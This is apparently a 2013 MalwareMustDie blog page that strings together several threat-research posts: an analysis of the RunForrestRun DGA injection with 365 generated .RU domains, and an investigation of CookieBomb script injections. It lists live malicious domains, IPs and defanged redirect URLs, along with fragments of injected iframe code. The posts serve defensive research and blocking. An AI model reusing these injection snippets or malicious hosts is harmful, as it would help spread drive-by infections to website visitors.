najniner.ru,126.65.174.136,
dakacdyn.ru,109.254.67.25,
higrikpy.ru,78.154.168.74,
dipteqna.ru,188.190.75.232,
kykywpik.ru,109.122.33.79,
cimmitic.ru,153.180.71.144,
suyzerew.ru,217.196.171.35,
yhzelbyp.ru,77.123.80.174,
aflyzkac.ru,93.185.220.213,
tejjetzo.ru,93.89.208.202,
lysopzoh.ru,178.168.22.114,
dyvgigim.ru,46.211.75.123,
jehrecyp.ru,87.69.55.36,
cyrkapov.ru,190.220.70.79,
niqtasoz.ru,178.150.17.118,
ginkyvub.ru,77.123.80.174,
zyvjofat.ru,93.79.152.211,
ihurvyun.ru,94.231.190.74,
izytexuf.ru,31.192.237.101,
adtyuhuz.ru,84.252.56.59,
aggaxsef.ru,94.230.201.36,
bomuxvis.ru,84.240.19.130,
xejabfom.ru,178.158.186.24,
sapigrys.ru,95.69.187.249,
sodkanxo.ru,117.197.245.69,
paxgeqjo.ru,49.205.210.193,
xoqhozaz.ru,95.160.83.57,
usfezhyk.ru,46.119.212.183,
hipahsah.ru,109.87.200.213,
talozzum.ru,31.133.52.8,
yrupxyen.ru,91.224.168.65,
nacwoman.ru,178.150.90.223,
libcikak.ru,46.119.128.115,
uphinjaq.ru,109.162.9.212,
aziwolge.ru,178.150.17.118,
oktizsez.ru,78.139.153.169,
kiyvryhy.ru,79.133.254.238,
fugegwyf.ru,188.190.75.232,
urxibzep.ru,91.225.173.12,
cibowjuv.ru,, // down
pedtokid.ru,, // down
bawoxgud.ru,31.133.55.240,
xudsahbu.ru,195.24.155.245,
dypqysro.ru,31.170.137.75,
jyuhysdo.ru,78.154.168.74,
hupjiwuc.ru,188.121.198.247,
cypseguv.ru,176.8.249.131,
confikja.ru,93.171.77.37,
tofhermi.ru,36.224.71.20,
ybtoptag.ru,180.61.12.116,
qeisybyg.ru,77.122.124.210,
mihumcuf.ru,93.185.220.213,
pywudcoz.ru,89.201.116.227,
kosnutef.ru,79.164.250.218,
acaqizwy.ru,178.150.244.54,
lymimnib.ru,117.197.15.103,
sisvizub.ru,89.28.52.30,
ankoweco.ru,, // down
uxmadjox.ru,, // down
hozfezbe.ru,178.210.222.205,

Again, we thank you to all friends, entities and support for your great cooperation and advise. Analysis and spotting a threat is one thing, but the hardest part is to make the threat goes down, better yet to put the crime responsible individuals to pay what they deserved.

MalwareMustDie will continue every effort to dismantle malware from internet and providing every crime evidence found to the related authority. Your help and support on every investigationwill be very appreciated.

Public announcement by #MalwareMustDie, NPO., 2013. All rights reserved.
Anti CyberCrime Research Group - malwaremustdie.org

Read More

The come back of the .RU RunForrestRun's DGA with 365 domains infector (ALIVE!)

I came into infection site spotted in Japan network as per snapshot below:

Which is a site to guide and introduce works for the lady workers, and that site is having infection of the obfuscation code of the RunForrestRun a DGA .RU domain-base malware infection. We are having experiences with this DGA from the day one we started malwaremustdie, so if you search for RunforrestRun keyword in our blog you'll see many result like this -->>[Google Search Result].

By successfully shutdown and stopping those infection cases in the past, using the knowledge we gathered, as a reference to share we released a public guide line for handling DGA cases as per posted in our Google Code here-->>[GoogleCode]

After a while we didn't see the activity of these infector, until yesterday accidentally saw the same infector once more. We posted this findings and how to decode this in our twitter announcement here:

#MalwareMustDie friends, the #DGA of RunForrestRun 「.RU」is back, https://t.co/OGMQLvYGZY can be cracked using our guide in Blog & GoogleCode

— MalwareMustDie, NPO (@MalwareMustDie) July 22, 2013

The obfuscation code

There are some changes in the infector we spotted now, practicaly the randomization logic is slightly improved, and double obfuscation used is using a "blackhole" style of encoding javascript. The obfuscation itself was encoded by two layer encoding stages, we saw soe similar encoding style of these in the infected sites which lead to Blackhole or Cool Exploit Kit, suggested a co-relation between those cases (i.e.: they purchased the encoding service). The decoding steps can be viewed in our pastebin here-->>[PASTEBIN]

If we see the front encoded method, the one we saw injected in hacked site, it has the below structure:

If you see the typical tag used for encoded part (red color), it was wrapped within the script tag (purple color) and the JavaScript's String.fromCharCode method was used for decoding the long obfuscation data between those tags.

Just run the above code in any JS simulator we'll get the real obfuscation code. The hexed code we paste in pastebin link (mentioned above) too. By feeding the obfuscation long data into the logic below:

document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? 

..it stores those data into document object to be decoded in the below generator:

Which (the red color) shows the deobfuscation logic and the purple color shows the "eval" method used to extract the decoded value.

Finally we came into the final deobfuscated result which is the core of the "RunForrestRun" infector domain randomization logic itself. In this version, the randomization code I separated into three parts, the seeds, calculation part, and formulation logic, as per below breakdown:

And the result will be written as IFRAME in of the .RU urls of:

"h00p://" + domainName + ".RU/ｒunforestｒun?ｓid=boｔnet2"

As per below code states:

The infector domain and current status

Our friend, Mr. Darrel Rendell helped to extract the .RU infector domains based on time input to the random logic as per he tweeted below:

@Secluded_Memory @unixfreaxjp @malm0u53 @Trojan7sec DGA dump is here http://t.co/PTWw04WfE0 #MalwareMustDie!

— Darrel Rendell (@DarrelRendell) July 23, 2013

The result is very good seperated by the function of dates within a year of cycle of the extracted 365 domains, which can be viewed here-->>[PASTEBIN] < With thank you for the help on this.

I just checked the current ALIVE of the extracted domains using our beloved tool which we share it here-->>[GoogleCode] and found the current domains ARE UP & ALIVE as per below list:

bumggasfaoywfncc.ru,195.22.26.231,
vvteeuevhpbpepfi.ru,91.233.244.102,
ijxsncuprepwqzlt.ru,91.233.244.102,
knuidyekzkyuhtpi.ru,91.233.244.102,

You can see the check PoC that I performed in our paste here-->>[MMD Pastebin]
The other way to check whether these domains alive or not is via root DNS it self, I pick the first domain and search/trace it records in DNS now and found it alive:

Tracing to bumggasfaoywfncc.ru[a] via a.root-servers.net., maximum of 1 retries
a.root-servers.net. (198.41.0.4)
 |\___ a.dns.ripn.net [ru] (2001:0678:0017:0000:0193:0232:0128:0006) Not queried
 |\___ a.dns.ripn.net [ru] (193.232.128.6)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) Got authoritative answer
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) Got authoritative answer
 |\___ b.dns.ripn.net [ru] (2001:0678:0016:0000:0194:0085:0252:0062) Not queried
 |\___ b.dns.ripn.net [ru] (194.85.252.62)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |\___ d.dns.ripn.net [ru] (2001:0678:0018:0000:0194:0190:0124:0017) Not queried
 |\___ d.dns.ripn.net [ru] (194.190.124.17)
 |     |\___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |      \___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |\___ e.dns.ripn.net [ru] (2001:0678:0015:0000:0193:0232:0142:0017) Not queried
 |\___ e.dns.ripn.net [ru] (193.232.142.17)
 |     |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
 |      \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)
 |\___ f.dns.ripn.net [ru] (2001:0678:0014:0000:0193:0232:0156:0017) Not queried
  \___ f.dns.ripn.net [ru] (193.232.156.17)
       |\___ ns2.csof.net [bumggasfaoywfncc.ru] (212.6.183.201) (cached)
        \___ ns1.csof.net [bumggasfaoywfncc.ru] (195.22.26.199) (cached)

The below is the current URLQuery report of the four alive .RU infector URLs/domains above to check the HTTP response, the thank's to URLQuery for its "on-the-record" feature:
http://urlquery.net/report.php?id=3952242
http://urlquery.net/report.php?id=3952365
http://urlquery.net/report.php?id=3952414
http://urlquery.net/report.php?id=3952290
The 3 domains above replied with the IP of 91.233.244.102 is currently an active domains which can be proved by the whois data below:

domain:        VVTEEUEVHPBPEPFI.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.04.15
paid-till:     2014.04.15
free-date:     2014.05.16
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK

domain:        IJXSNCUPREPWQZLT.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2013.04.15
paid-till:     2014.04.15
free-date:     2014.05.16
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK

domain:        KNUIDYEKZKYUHTPI.RU
nserver:       dns1.webdrive.ru.
nserver:       dns2.webdrive.ru.
state:         REGISTERED, DELEGATED, UNVERIFIED
person:        Private Person
registrar:     REGGI-REG-RIPN
admin-contact: https://panel.reggi.ru/user/whois/webmail/
created:       2012.11.06
paid-till:     2013.11.06
free-date:     2013.12.07
source:        TCI
Last updated on 2013.07.24 01:36:36 MSK

As per seen in the above data, the REGGI.RU registrar was tricked/abused somehow to let these domains entering internet. Later on we know that one domain left was sinkholed in 195.22.26.231.
We also learned that the abuse type of registration in Russia registrar always show the status of REGISTERED, DELEGATED, UNVERIFIED just as per stated in the above active domains. This information is very important to follow the shutdown process further.

The conclusion

This DGA is ALIVE and harmful. Please block these domains for it is proven ALIVE.
The usage of these DGA will not be good, so no further verdict needed from our side.
Our friend Conrad Longmore, from Dynamoo Blog also suggest all of us to block IP: 91.233.244.102 as per recorded many malicious activities found in this IP, as per following his tweet:

@MalwareMustDie @DarrelRendell @malm0u53 Lots of bad things on 91.233.244.102 http://t.co/KxwNwgIaQ6

— Conrad Longmore (@ConradLongmore) July 23, 2013

For the conveniences of the dismantling purpose we pasted also the list of domains we decoded from this DGA below, sorry for taking so much space for this report:

kxfcnwlyyohascji.ru
wjikjkybqouienfm.ru
jwkynwfxjqdqqmji.ru
vjnhblgryauqcpmr.ru
iwoughjskqxnoury.ru
tirdttcivfplnrds.ru
gwtrhozqbvudulyl.ru
siwafwlsbplqrxly.ru
fvxordgblagqooqx.ru
rhbyvkanoqokqyit.ru
evdmudjenjokhgmz.ru
phgunkwwcglepbdc.ru
cuijmuljysivscwe.ru
oglrzlxpvxfhgihb.ru
bumggasfaoywfncc.ru
ngpormkfmmcfgysb.ru
yrqwbnjqbnfhpbuu.ru
lguktmilemdssbyx.ru
xrvstpmjbtxnttxd.ru
kfzhvfgdfixkfdrr.ru
wqbrmmqhlkusiixa.ru
jfegifyhkbjxfflc.ru
uqfnewvxvyvsrxuk.ru
hejcagnpfrpnqefc.ru
tqkkpnnamkpqnyym.ru
genyzeyokjwxykzm.ru
spphczekzysdypqb.ru
fdsvrfljfaskbylv.ru
qptetotipsmswbqw.ru
ddxrlumbiwovldwg.ru
poyalyqorovwqves.ru
ntppvruxnkdjhvbh.ru
zgsxmhffvnizvxft.ru
mtuloilstrcfoykq.ru
yfxueilamhutmmnr.ru
ksyiaulnbpgnxpjs.ru
wfcsvebxgiynxlbc.ru
jsehchxfgboukksb.ru
vehpowijritygngg.ru
isjdecxytkoiazad.ru
uemmazcuvorvsadb.ru
grnzukxvhqnjfana.ru
sdqirxitzjgxxxhf.ru
frswwkcwyjwmrorb.ru
rdvfkzvdqxpufsep.ru
eqxsyluecdcxpped.ru
qdbewgrvhvwygvlo.ru
cqcrrdgweomwshmp.ru
ocfaopqtguzswofi.ru
bpholidutrkjmtpp.ru
nckwyplkpfqczmxl.ru
znlfqprdgejpllxi.ru
mbosgirfmfoygmhk.ru
xnqbiapjqcpvvcqz.ru
kbtpctegrcuillhc.ru
wmuxxiagzhcieofr.ru
jaymuwnpcjtqcwot.ru
vmzukuabemehxwpw.ru
hzbkqtgarqrmdlcx.ru
qqafbwfwjrflbmdo.ru
deeskswjfulkurjc.ru
ppfbslcowvdivwmr.ru
cejpdwxlftekbrch.ru
npkxjvsffuotzmij.ru
adnmvxwbyzjwvasg.ru
moouumrwtvnetzfu.ru
ybrdscaecknwugpu.ru
lotqnwonxpgigjox.ru
xawyilvvdurtcltc.ru
joynyhkerylsfygl.ru
vzzvoqbscqsnmrqr.ru
indlredwgvungvsq.ru
uyethhnsehcfqilz.ru
hniitysuwprckvzs.ru
syjqyvrpyohlexgj.ru
fmmflppopijsipdr.ru
ryonlorhvoekruec.ru
emrbflbunrcqrjgk.ru
qxsjdyodxeyyechp.ru
dlwxvurpfeyqyqcj.ru
oxxguneutbrhtsjx.ru
blbwpvcyztrepfue.ru
nwcenehdgqyxtssq.ru
zjfndnhwdsrwephi.ru
mwhbjgismatmjuji.ru
yikkpeqinkedjnxs.ru
kvmxjgblbhjgpjvw.ru
wipgnmjxfgwttrlf.ru
jvqtbrrbikxribjl.ru
vhtdynyciknmkblg.ru
tmlrjxvvrvkyxofn.ru
gbogvuamqydsxcgz.ru
smpovxvnxkelrgzt.ru
eatdfntzfgqrprmj.ru
qlulnseexvzpptcm.ru
dzvyrlqebdcolbei.ru
plzhfkuhkocvqwvx.ru
cybxcikisigkmqtl.ru
olegrpgtdxosnnkc.ru
aygtmclwegxsmjid.ru
mkjdkbwuxcnuxtqd.ru
yvklttrmfvygrvwk.ru
lknyzylpjzkasnmo.ru
xvphlknpxewklsyd.ru
kjsvlbwoxhcbtfpq.ru
vvteeuevhpbpepfi.ru
ijxsncuprepwqzlt.ru
uuyavjatmoykgodf.ru
hicqgipogsjulrgn.ru
tudygcklurkthcmt.ru
gihnijebfitftukm.ru
rtivxqoindugifaf.ru
ehmjatkmhnivwxdo.ru
qtnrpbmfuierqstw.ru
dhqgdpbdxrusdxcw.ru
psroiljvwkqrnfqf.ru
bhvdnklorkjcfppd.ru
nswltcjxwwnbrljp.ru
agabgtdhgsbspwsq.ru
mrcjwchanjuilitl.ru
yefscrehgfveysyc.ru
wjvftsujnszcvevs.ru
jwwtixcvymcflhob.ru
vibeglyuxuzbkgbo.ru
hwcrlxhvrevsnzwl.ru
tifbsmujkhbvbkyj.ru
gvhodonxvblrghch.ru
shkwimusoizncvhx.ru
fvllwtyeleporhen.ru
rhotamrrectjqfto.ru
duqhgptpqmsyyrqj.ru
phtqmnbhcmyknyss.ru
cuveztrnrgnshbgp.ru
ogymeohrjxfscgfs.ru
btacsqzlgctcxjei.ru
mgdlwkvcgkygcqck.ru
yretgeoqsvdnikar.ru
lfihodgqdjmfqppt.ru
xrjpymuxzutqaudg.ru
kfnebggkwsjlxzbk.ru
wqomqwbvtwiwejid.ru
ierbdycqkclubnex.ru
uqsiihfbyeotruuc.ru
hewwcxblormskqae.ru
tpxfuxwvnqcmekoi.ru
gdbvudwhpnuwrdls.ru
spdenojggmdrlixc.ru
edgsojssutkqjbxg.ru
qohaffgzdpnksohx.ru
ddloyfnurjprfwnb.ru
pomwopzpscwqxpfv.ru
zfguwvhdmjlutvwo.ru
mtiidqbknpskzasp.ru
xflrjyyjswoatsoq.ru
ksmfflbpefxgfdsv.ru
wepnhoeeodiklyar.ru
jsrcwahdmdarwmto.ru
veukmrlhkghlqqjn.ru
irwxwuybkwltqnhx.ru
tezhfswbxfnnuhbd.ru
grbwyglkgkieiybk.ru
sdefwonjqnujdoxr.ru
fqgtjwvcrkmuhkco.ru
rdjcjrxljzaughvt.ru
eqkplxtjjuhkbeqs.ru
pcoyyxsfhsyysfme.ru
cppmejjneikodxrc.ru
ocsuqiqvvknfvcjp.ru
bpujwsmplvftnqcx.ru
nbxrjalwllvnbmfs.ru
znyzszkdrxgnovuq.ru
lbcpvpxigyferhws.ru
xmexlajhysktwdqe.ru
kahmnunornwrgpgb.ru
wmiudbgrcvapriql.ru
jzkitejvrxgkgpgi.ru
ulnrpbudycxzdlkt.ru
hyoflopkupjioiqq.ru
tlrnhskrgijhwtlj.ru
gytcnulxsxpsqkfn.ru
skwkybckmywhrhbb.ru
dernflilrdxmfnye.ru
ppsvcvrcgkllplyn.ru
bdvkpbuldslsapeb.ru
npxsiiwpxqqiihmo.ru
adbjjkquyyhyqknf.ru
mocrafrewsdjztbj.ru
yafzvancybuwmnno.ru
lohnrnnpvvtxedfl.ru
wakvnkyzkyietkdr.ru
jnlkttkruqsdjqlx.ru
vznrahwzgntmfcqk.ru
inqgvoeohpcsfxmn.ru
uyrorwlibbjeasoq.ru
gmvdnpqbblixlgxj.ru
sywleisrsstsqoic.ru
fmacqvmqafqwmebl.ru
rxbkqfydlnzopqrn.ru
elfxqghdubihhsgd.ru
qxggipnnfmnihkic.ru
clkujrjqvexvbmoi.ru
owldagkyzrkhqnjo.ru
blorcdyiipxcwyxv.ru
nwpykqeizraqthry.ru
zisiiogqigzzqqeq.ru
mvuvchtcxxibeubd.ru
xixftoplsduqqorx.ru
kvzstpqmeoxtcwko.ru
whddmvrxufbkkoew.ru
jveqgnmjxkocqifr.ru
vhhzcvbegxbjsxke.ru
iujniiokeyjbmerc.ru
gacdiuwnhonuulpe.ru
rmdlgyreitjsjkfq.ru
ezfydrexncoidbus.ru
qlihxnncwioxkdls.ru
dyjvewshptsboygd.ru
plmekaayiholtevt.ru
cyosongjihugkjbg.ru
nkrbvqxzfwicmhwb.ru
axtopsbtntqnfdyk.ru
mkwwclogcvgeekws.ru
yvxfekhokspfuwqr.ru
ljbvfrsvcevyfhor.ru
xvcewyydwsmdgaju.ru
jjgshrjdcynohyuk.ru
vuhaojpwxgsxuitu.ru
iiloishkjwvqldlq.ru
uumwyzhctrwdsrdp.ru
hiplksflttfkpsxn.ru
ttqtkmthptxvwiku.ru
fhuidtlqttqxgjvn.ru
rtvqcdpbqxgwnrcn.ru
ehyewyqydfpidbdp.ru
qsbourrdxgxgwepy.ru
dhedppigtpbwrmpc.ru
osflhkaowydftniw.ru
bgjzhlasdrwwnenj.ru
nrkhysgoltauclop.ru
zenquqdskekaudbe.ru
mroeqjdaukskbgua.ru
ydrngsmrdiiyvoiy.ru
krtbityuhlewigfe.ru
jwkpdxqbemsmclal.ru
uinyjmxfqinkxbda.ru
hvpmffxpfnlquqxo.ru
tisubmfvqrgnloxr.ru
gvujhzvjxwptrtdg.ru
shxrsvasoncjnxpn.ru
fuyfrockpfclxccd.ru
qhcplcuugevvyham.ru
dueebwwdllfburag.ru
pghnrmkoeoetfwsm.ru
ctjbmgjudwisgshv.ru
ogmjjmqdhlbyabzg.ru
atnwerhvttvbivra.ru
mfqfrnqllqcrayiw.ru
yrrnrgliojezjctg.ru
lfvcngdbzjrzgyby.ru
xqwkdyjydkggsppd.ru
keabgwmpzqhpmlng.ru
vqcicnuhtwhxmtjd.ru
iefwvulgninlkoxe.ru
upgghggmbusopaxv.ru
hektxucstnbuncix.ru
tplczomvebjmhsgk.ru
gdoqznfilmtulxxv.ru
ropypfmcqjjfdiel.ru
edtmjcvfnfcbweed.ru
qouubrmdxtgnnjvm.ru
dcyjurmfwhgvyoio.ru
pozrtgdmhvhvdscn.ru
ccdifvomwhtynpay.ru
nneplwlvlcojiegm.ru
lsvdxjpwykxxvryd.ru
xfymtpavzblzbknq.ru
ksacasnubklrikdl.ru
wedkgpdcxlrunbmu.ru
jrfyaswntteouafv.ru
veihxoqukuetxqbn.ru
hrkusbnevtmyisab.ru
tdndpphrtyniynvz.ru
gqortbbbsnksxpmm.ru
sdrzgpowhyckaogu.ru
fqtooihtbhwdxskt.ru
rcwwrqssqrrfpgvd.ru
dpxkgybdgttbeyfh.ru
pcbukgjlihpvehyu.ru
cpdjalvpsvfgqtbd.ru
obgrcxuqunmquthx.ru
bpifbqdpzavdjljq.ru
nbloiroucuvotnck.ru
ymmwxgaimxgqtrdv.ru
lapkpatjbkubfxeu.ru
xmqspbcjfttkibbg.ru
kauhrjmdqenmtyvk.ru
wlvpilfxnxpdoujt.ru
jzxdofqtnlusever.ru
ulbnairmbptfscka.ru
hyccqffkdslpbuue.ru
tkfksqvkqdhspdsm.ru
gyhxgveinbdufdnt.ru
skkhxjykeyukyebl.ru
exmubcrfgpaijgzx.ru
opgsgmrejtyazcrf.ru
bdjhtgqhggicwrmy.ru
nolpsdqvivphcoew.ru
zboxoswkbebgarsh.ru
moplknnccyfkesaj.ru
yasuaexybixmvnge.ru
knuidyekzkyuhtpi.ru
wzvqmhzpppziurdl.ru
jnyfopdfycjyfomx.ru
vybofxkqmidtcnhq.ru
imedqfzemirxjqhn.ru
tyflwmgobjignmbd.ru
gmjzqviddrqumknm.ru
sxkiifqgzmsjvxzn.ru
fmnvbcuebuoyhxgq.ru
rxoebpmmwjgsphyp.ru
elsskgujckxkdqry.ru
pwtbsyitleslzngt.ru
clxpvwfqexkciciu.ru
owyxdqwgvlyndmwr.ru
bkcnxdtvxcjpyobq.ru
nwdvufzkpszkvxxk.ru
zigfmudoxbqehljf.ru
lvishxhsbgoyclva.ru
xhlbffbmicnnxpsk.ru
kvnoygvsciiyrnlp.ru
whqxutzyuwvaijbq.ru
jurlbjnqmycnjoat.ru
vhutmessbhrhonso.ru
huwiddttqzujegjk.ru
tgzqyfhfekefmnuv.ru
rlqglzqqhehmtryd.ru
eystwwslgmwxzqsu.ru
qlvcdbyuturxcusx.ru
dywqzqyouieuojub.ru
pkabphfegwhtnoug.ru
bycojtqkhamhawoj.ru
nkfxfqvofqbuhuuz.ru
axhlltpcxcixsdhv.ru
mjktxpzccvifevpc.ru
yvlcjbweeheoixyj.ru
ljoqjstmgdotqyll.ru
wupyyjwqhozwdpcb.ru
jitnlsxlmbtdzmwf.ru
vuuurusnjxorennj.ru
iiyjdtxigdyuyzcz.ru
utzrdmsexiffrltv.ru
hidifzbettjuadfh.ru
steqvhuhrqsmynoh.ru
fhifzexvhegcjtdx.ru
rsjmnrjedkuvhwfs.ru
ehmbrpusljbmykrn.ru
qsojzcltslhstxnj.ru
dgrxbomayxjhdike.ru
ossgrsfecodjxjhy.ru
bgwutpbwpbcrzthd.ru
nrxcdfhydmlcnoay.ru
zdbnzonswqhjphqh.ru
mrcblkrgikgxxtwc.ru
xdfjryydcfwvkvui.ru
kqhxgmvevducviey.ru

#MalwareMustDie!

Read More

What is behind #CookieBomb attack? (by @malm0u53)

You know me as @malm0u53 crusade member of MalwareMustDie. I would write about what #CookieBomb code injection's attack can actually damage and infect our system with this investigation report.

I saw a wide spread infection of code injection reported in here, and decided to help the investigation:

RT @unixfreaxjp: @Secluded_Memory you know I would if i could, I cant now, grab it from my prev.tweets, --- Helping too

— MalMouse (@malm0u53) July 22, 2013

As you may see in my tweets, I was struggling with the recent infection reported. And I came into conclusion of what to grep to follow and mitigate this attack further:

@Secluded_Memory @unixfreaxjp CookieBomb javascript. Which seems to be the function zzzfff()

— MalMouse (@malm0u53) July 22, 2013

@Secluded_Memory @unixfreaxjp one variant out of last three days - showkod(){ versus zzzfff() hxxp://airbrush-design.cz/images/nGMcmjkK.php

— MalMouse (@malm0u53) July 22, 2013

Which ending up to the list of the functions and its IFRAME redirection below:

" function zzzfff() { mdi.src = 'hxxp://kirtec.de/asvz/Mgf4RNhq.php';
" function zzzfff() { ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
" function zzzfff() { e.src =   'hxxp://onewaypr.my-ehost.com/products/YFb48ymx.php';
" function zzzfff() { y.src =   'hxxp://yogyavilla.com/Map_Chinese_files/dtd.php';
" function zzzfff() { ywbc.src ='hxxp://htm.co.za/js/clicker.php';
" function zzzfff() { kaizc.src ='hxxp://press2.blogolize.com/cnt.php';
" function zzzfff() { yk.src = 'hxxp://gidropark.net/traf.php';
" function zzzfff() { rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
" function zzzfff() { e.src = 'hxxp://www.viagemanimais.com.br/2R83bpTL.php';
" function zzzfff() { gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
" function zzzfff() { gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
" function zzzfff() { c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';"
" function zzzfff() { csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
" function zzzfff() { nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
" function zzzfff() { ax.src = 'hxxp://portofmiamicruiseparking.com/log/dtd.php';
" function zzzfff() { orih.src = 'hxxp://smartsecurit.cz/clik.php';
" function zzzfff() { i.src = 'hxxp://hauser-consulting.com/relay.php';
" function zzzfff() { pndb.src = 'hxxp://rocklandaerospace.com/edi/x46kpMKR.php';
" function zzzfff() { iwuu.src = 'hxxp://www.mai-ban.com/clik.php';
" function zzzfff() { p.src = 'hxxp://koliba.xercom.cz/yjW7x3V8.php';
" function zzzfff() { chyo.src = 'hxxp://dv-suedpfalz.de/melde/dtd.php';
" function zzzfff() { iin.src = 'hxxp://casino.kuti-komi.com/traf.php';
" function zzzfff() { di.src = 'hxxp://web134.sv01.net-housting.de/dtd.php';
" function zzzfff() { gir.src = 'hxxp://www.teutorace2012.de/components/mjBr9dbV.php';
" function zzzfff() { obgn.src = 'hxxp://www.talkingtojesus.com/Backups/QLMyqwF9.php';
" function zzzfff() { qvhb.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { s.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { ucr.src = 'hxxp://www.springcupcdv.it/relay.php';
" function zzzfff() { vpbo.src = 'hxxp://inntech.org.ru/counter.php'
" function showkod(){ js_kod.src = 'hxxp://airbrush-design.cz/images/nGMcmjkK.php';
[...]

Wow. Many links to follow.. So I made breakdown check for each PHP infectors as per released in pastebin: http://pastebin.com/raw.php?i=0cGUGk8X

The significant results I summarized below:

One of the link of:

" function zzzfff() {
ony.src = 'hxxp://www.ics-it.de/ftp_folders/JptDMrR2.php';
redirect  >> hxxp://kastenbafortschrittliche.jaimestexmex.com:801/untrue-doing-edge_ago.htm

Which goes straight to the exploit page landing page I mentioned here

The other link goes straight to the fake 502:

function zzzfff() {
rf.src = 'hxxp://appssold.com/wp-content/plugins/wp_add/D7AoggfC.php';
"  >> 500 Internal Server Error
// header..
HTTP/1.1 500 Internal Server Error
Date: Mon, 22 Jul 2013 18:05:49 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/0.9.8e-fips-rhel5 
        mod_auth_passthrough/2.1 mod_bwlimited/1.4 
FrontPage/5.0.2.2635
Content-Length: 704
Connection: close
Content-Type: text/html; charset=iso-8859-1

Verdict of the malicious URL above is here

One of the link redirecting to the localhost, strange for a good link is it?

" function zzzfff() {
     gifdu.src = 'hxxp://olafknischewski.de/usage/esd.php';
  HTTP/1.1 302 Found

Date: Mon, 22 Jul 2013 18:14:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.12-nmm3
Location: http://localhost/
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

One link lead to permanent redirection of Exploit Kit landing page, that IP is a Plesk panel user:

" function zzzfff() {
     gzz.src = 'hxxp://intrologic.nl/Mn84DfXb.php';
"  HTTP/1.1 301 Moved Permanently

Date: Mon, 22 Jul 2013 18:16:48 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.intrologic.nl/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Location: hxxp://www.intrologic.nl/Mn84DfXb.php
X-Powered-By: PleskLin

↑Verdict: [1] and [2]

One link of:

" function zzzfff() {
 c.src = 'hxxp://goldsilver.server101.com/ORIGINALGSB/traf.php';" ＞
Redirects users to: 　hxxp://www.schwarzeraben.de/rel.php

Loads malware from:

fgnfdfthrv.bee.pl
alolipololi.osa.pl 
gberbhjerfds.osa.pl
zxsoftpromo.ru
centralfederation.ru
chimeboom.ru
faqaboutme.ru
lkjoiban.ru
longqwality.ru
zxsoftpromo.ru

↑This attack uses the .htaccess file to redirect users to a sites serving malware. Verdict: [1] http://labs.sucuri.net/db/malware/malware-entry-mwhta7 [3]
The MMD tools for domains check shows result of:

fgnfdfthrv.bee.pl,127.0.0.1,
alolipololi.osa.pl,74.125.236.80,
gberbhjerfds.osa.pl,127.0.0.1,
zxsoftpromo.ru,,
centralfederation.ru,,
chimeboom.ru,,
faqaboutme.ru,,
lkjoiban.ru,,
longqwality.ru,,
zxsoftpromo.ru,,

which means (WARNING!) the alolipololi.osa.pl domain is currently active for infection,
the fgnfdfthrv.bee.pl and gberbhjerfds.osa.pl is currently blacklisted and other .RU domains is inactive.

The below links went straight to the blacklisted sites:

" function zzzfff() {
csp.src = 'hxxp://thyrr062.xsrv.jp/clicker.php';
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 18:57:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.3
Connection: close
Content-Type: text/html

↑Verdict: [1] [2]

And..

" function zzzfff() {
     nex.src = 'hxxp://informationking.com/dnlds/kQBx948q.php';
"
HTTP/1.1 200 OK
Date: Mon, 22 Jul 2013 19:03:40 GMT
Server: Apache/1.3.41 (Unix) FrontPage/5.0.2.2635 PHP/5.2.17 mod_ssl/2.8.31 OpenSSL/0.9.8j
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html

Verdict: [1] [2]

With many other similar results in the pastebin I reported here

This investigation is posted to help to verdict the malicious activities caused by #CiookieBomb code injection attack and the shutdown purpose for its detected malicious domains. The post is a work of the group effort, thank you to: @DarrelRendell and @Secluded_Memory for the help supporting this case with great advice.

#MalwareMustDie!

Read More

Alert: (Yet more) misleading adverts [iLivid, Tuguu]

One of these days (yep, day dreaming again), I'll go on a little virtual walk, and not bounce off of misleading adverts such as the following. All were found in the usual places (adf.ly, adfoc.us) and sites engaged in scamming (watchfreemovies.ch - found whilst investigating another site).






The award for the most disgusting scareware advert goes surprise surprise, to SysTweak - who are

Read More

Some encoding note(s) on modified #CookieBomb attack's obfuscated injection code

